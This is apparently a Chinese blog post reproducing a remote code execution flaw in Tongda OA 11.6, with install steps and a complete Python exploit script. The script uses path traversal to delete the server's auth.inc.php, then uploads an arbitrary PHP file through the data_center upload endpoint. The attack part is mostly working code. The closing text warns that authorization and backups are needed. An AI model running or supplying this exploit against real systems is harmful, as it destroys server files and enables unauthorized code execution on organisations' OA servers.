通达oa 不允许从该ip登陆_通达OA RCE复现

安装

下载通达OA安装包进行安装。

下载链接:

链接: https://pan.baidu.com/s/1tSuxT3N2zdEPwGH07-pmRw 密码: t9s3

e88da80e648cf76095a7e42a5ac0972f.png

3b78a56fedd42550e179621ab0041fa7.png

0db6c6a5c26a88cac5b23cae64084e99.png

bbea2ad9964a73dd5a46c0910a117733.png

af75fcdeb705b711b564d0c3c3e1749a.png

7dece91b899bd5472f807b4123c7a341.png

安装完成后会自动打开页面。

d5dcf08eca91c4ba899601366532df12.png

漏洞利用

# _*_ coding utf-8 _*_# author:return0;import requeststarget="http://10.211.55.5"payload="<?php echo HelloWorld ?>"print("[*]Warning,This exploit code will DELETE auth.inc.php which may damage the OA")input("Press enter to continue")print("[*]Deleting auth.inc.php....")url=target+"/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php"requests.get(url=url)print("[*]Checking if file deleted...")url=target+"/inc/auth.inc.php"page=requests.get(url=url).textif 'No input file specified.' not in page:    print("[-]Failed to deleted auth.inc.php")    exit(-1)print("[+]Successfully deleted auth.inc.php!")print("[*]Uploading payload...")url=target+"/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./"files = {'FILE1': ('hack.php', payload)}requests.post(url=url,files=files)url=target+"/_hack.php"page=requests.get(url=url).textif 'No input file specified.' not in page:    print("[+]Filed Uploaded Successfully")    print("[+]URL:",url)else:    print("[-]Failed to upload file")

然后运行此代码

79f51702ba7a98c412408d023baf8f6d.png

使用浏览器打开链接即可复现成功,该漏洞在实际安服渗透验证复现时需通知客户做好备份。安服仔在验证时不需要删除auth.inc.php文件,自行编写脚本验证该文件存在且OA版本为11.6即可证明存在此漏洞。网络不是法外之地,渗透测试需在得到客户充分授权并告知客户风险的情况下开展。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值